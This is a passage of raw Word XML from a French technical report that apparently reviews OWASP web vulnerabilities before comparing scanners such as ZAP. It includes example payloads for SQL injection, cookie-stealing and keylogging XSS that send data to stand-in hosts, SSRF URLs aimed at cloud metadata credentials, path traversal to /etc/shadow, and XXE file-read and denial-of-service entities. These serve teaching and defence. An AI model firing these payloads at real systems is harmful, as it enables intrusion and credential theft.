        <w:t>Trois variantes principales existent :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197B251" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi basée sur les erreurs : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'application retourne des messages d'erreur SQL directs, révélant la structure de la base.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A0BD12" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi basée sur le temps : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'application est vulnérable mais ne renvoie pas d'erreurs — on utilise des délais (SLEEP, WAITFOR) pour déduire les informations bit à bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088227BF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi booléenne : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>En injectant des conditions TRUE/FALSE, on observe si la réponse change pour déduire des informations sans messages d'erreur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B7374" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Exemples de payloads SQL Injection classiques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8CAEE" w14:textId="77777777" w:rsidR="006A6D93"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pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-- Authentification bypass classique</w:t>
        <w:br/>
        <w:t>' OR '1'='1</w:t>
        <w:br/>
        <w:t>' OR '1'='1'--</w:t>
        <w:br/>
        <w:t>admin'--</w:t>
        <w:br/>
        <w:br/>
        <w:t>-- Extraction de données (UNION-based)</w:t>
        <w:br/>
        <w:t>' UNION SELECT username, password, NULL FROM users--</w:t>
        <w:br/>
        <w:br/>
        <w:t>-- Time-based (MySQL)</w:t>
        <w:br/>
        <w:t>' AND SLEEP(5)--</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>-- Time-based (MSSQL)</w:t>
        <w:br/>
        <w:t>'; WAITFOR DELAY '0:0:5'--</w:t>
        <w:br/>
        <w:br/>
        <w:t>-- Time-based (PostgreSQL)</w:t>
        <w:br/>
        <w:t>' OR pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E0997" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Impact : lecture complète de la base de données, modification ou suppression de données, contournement de l'authentification, exécution de commandes OS (via xp_cmdshell sur MSSQL). Score CVSS v3.1 : 9.8 (Critique).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462CCE2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.4.2  Cross-Site Scripting (XSS) — OWASP A03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5ACAA6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le XSS permet à un attaquant d'injecter du code JavaScript malveillant dans les pages web vues par d'autres utilisateurs. C'est l'une des vulnérabilités les plus répandues sur le web, présente dans près de 75 % des sites selon WhiteHat Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D2643" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS Réfléchi (Reflected) : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le payload est inclus dans l'URL et reflété immédiatement dans la réponse. Nécessite d'inciter la victime à cliquer sur un lien malveillant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5197A8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS Persistant (Stored) : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Le payload est stocké en base de données (commentaire, profil) et servi à tous les visiteurs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Beaucoup plus dangereux car automatique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3133CE2A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS basé sur le DOM : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Exploitation du DOM côté client sans passer par le serveur — le payload ne transite pas dans la réponse HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78FBB3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Exemples de payloads XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5CBEB8" w14:textId="77777777" w:rsidR="006A6D93"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pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>&lt;!-- XSS basique — vol de cookie --&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;document.location='http://attacker.com/steal?c='+document.cookie&lt;/script&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">&lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>XSS — keylogger --&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;document.onkeypress=function(e){new Image().src='http://evil.com/?k='+e.key}&lt;/script&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- XSS — bypass de filtres --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror=alert(1)&gt;</w:t>
        <w:br/>
        <w:t>&lt;svg onload=alert(document.domain)&gt;</w:t>
        <w:br/>
        <w:t>&lt;body onpageshow=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100D77A2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.4.3  IDOR — Broken Access Control (OWASP A01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB32CB5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'Insecure Direct Object Reference (IDOR) se produit lorsqu'une application expose des références directes à des objets internes (identifiants numériques séquentiels, noms de fichiers, clés de base de données) sans vérifier que l'utilisateur est autorisé à y accéder. C'est la catégorie la plus fréquente en 2021 (94 % des applications testées présentaient une forme de broken access control).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C7180F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Exemples d'IDOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF2DE7A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874"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Accès au profil d'un autre utilisateur</w:t>
        <w:br/>
        <w:t>GET /api/users/1337/profile      -&gt; données de l'utilisateur 1337</w:t>
        <w:br/>
        <w:t>GET /api/users/1338/profile      -&gt; données d'un autre utilisateur (IDOR)</w:t>
        <w:br/>
        <w:br/>
        <w:t>-- Accès aux factures d'un autre compte</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t>GET /invoices/download?id=1001   -&gt; votre facture</w:t>
        <w:br/>
        <w:t>GET /invoices/download?id=1002   -&gt; facture d'un autre client (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4DBECA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.4.4  SSRF — Server-Side Request Forgery (OWASP A10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D4EBC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le SSRF force le serveur web à effectuer des requêtes HTTP vers des destinations contrôlées par l'attaquant. Dans les environnements cloud modernes (AWS, GCP, Azure), cela permet d'accéder aux services de métadonnées d'instance (169.254.169.254 sur AWS), qui exposent des credentials IAM temporaires donnant accès à l'ensemble de l'infrastructure cloud. La vulnérabilité Capital One (2019, 100 M dossiers clients volés) était une SSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E245CE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Exemples de payloads SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CE2EE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874"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SSRF vers métadonnées AWS</w:t>
        <w:br/>
        <w:t>http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
        <w:br/>
        <w:br/>
        <w:t>-- SSRF vers métadonnées GCP</w:t>
        <w:br/>
        <w:t>http://metadata.google.internal/computeMetadata/v1/</w:t>
        <w:br/>
        <w:br/>
        <w:t>-- SSRF vers services internes</w:t>
        <w:br/>
        <w:t>http://127.0.0.1:8080/admin</w:t>
        <w:br/>
        <w:t>http://10.0.0.1/config</w:t>
        <w:br/>
        <w:t>http://internal-db:5432/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBA77EF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.4.5  Path Traversal (OWASP A01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259803DC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le Path Traversal (ou Directory Traversal) exploite une validation insuffisante des chemins de fichiers pour accéder à des fichiers arbitraires sur le serveur, en dehors du répertoire prévu. L'attaquant utilise des séquences '../' pour remonter l'arborescence et accéder à des fichiers système sensibles (/etc/passwd, /etc/shadow, les clés SSH, les fichiers de configuration d'application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D8E876" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Exemples de payloads Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435AD307" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874"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Path Traversal basique</w:t>
        <w:br/>
        <w:t>GET /download?file=../../etc/passwd</w:t>
        <w:br/>
        <w:t>GET /download?file=..%2F..%2Fetc%2Fshadow</w:t>
        <w:br/>
        <w:br/>
        <w:t>-- Encodages alternatifs (bypass de filtres)</w:t>
        <w:br/>
        <w:t>..%252f..%252fetc%252fpasswd     (double encodage URL)</w:t>
        <w:br/>
        <w:t>....//....//etc/passwd            (variation)</w:t>
        <w:br/>
        <w:t>..%c0%af..%c0%afetc%c0%afpasswd  (encodage UTF-8 overlong)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E9D6C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.4.6  XXE — XML External Entity (OWASP A05)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC9DE99" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Lorsqu'un parseur XML traite des entités externes définies dans le DTD (Document Type Definition) d'un document XML fourni par l'utilisateur, il peut divulguer des fichiers locaux, effectuer des requêtes SSRF, ou même provoquer un déni de service (Billion Laughs Attack). Les frameworks modernes désactivent généralement le traitement des entités externes par défaut, mais des configurations héritées ou mal configurées restent vulnérables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D6D6D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Exemples de payloads XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B99E8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="AABBCC"/>
          <w:left w:val="single" w:sz="6" w:space="4" w:color="003366"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="AABBCC"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="AABBCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="40" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</w:t>
        <w:br/>
        <w:t>]&gt;</w:t>
        <w:br/>
        <w:t>&lt;request&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;username&gt;&amp;xxe;&lt;/username&gt;</w:t>
        <w:br/>
        <w:t>&lt;/request&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- XXE via SSRF --&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"&gt;]&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">&lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Billion Laughs (DoS) --&gt;</w:t>
        <w:br/>
        <w:t>&lt;!DOCTYPE bomb [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!ENTITY a "aaaa...aaaa"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;!ENTITY b "&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;&amp;a;"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ...</w:t>
        <w:br/>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C32AB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.4.7  Upload de Fichier Non Sécurisé (OWASP A04)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0CA2D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les fonctionnalités d'upload de fichiers, si elles ne valident pas strictement le type et le contenu des fichiers acceptés, peuvent permettre à un attaquant d'uploader un web shell (fichier PHP, JSP, ASP malveillant) directement exécutable par le serveur. Il suffit alors de naviguer vers l'URL du fichier uploadé pour exécuter des commandes arbitraires sur le serveur avec les privilèges du processus web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E8E428" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les validations insuffisantes courantes : vérification de l'extension côté client uniquement (contournable), vérification du Content-Type HTTP (falsifiable), absence de vérification des magic bytes (signatures binaires des formats de fichiers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F85BB22" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.4.8  Failures d'Authentification (OWASP A07)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868D0B6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les failles d'authentification incluent l'utilisation de credentials par défaut (admin/admin, admin/password), l'absence de rate limiting sur les formulaires de login (permettant le brute force), la transmission de mots de passe en clair (HTTP au lieu d'HTTPS), les sessions sans expiration, et l'absence de mécanismes MFA. Ces failles sont particulièrement critiques car elles permettent souvent une compromission complète du compte ciblé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381B82ED"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1.5  Outils de Scan Existants — Analyse Comparative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A8967" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le marché des outils de scan de vulnérabilités web est divisé entre solutions professionnelles onéreuses et outils open source aux capacités plus limitées. Nous analysons ici les quatre solutions les plus répandues afin de positionner notre approche.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5FCF4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.5.1  OWASP ZAP (Zed Attack Proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F5C986" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP ZAP est le scanner de sécurité web open source le plus utilisé au monde. Développé et maintenu par l'OWASP depuis 2010, il propose deux modes principaux : un proxy intercepteur permettant d'analyser manuellement le trafic HTTP/HTTPS, et un mode daemon/API pour </w:t>
        <w:lastRenderedPageBreak/>
        <w:t>l'intégration dans des pipelines CI/CD. ZAP dispose d'une architecture extensible via des add-ons communautaires et d'une API REST complète.</w:t>
      </w:r>
    </w:p>
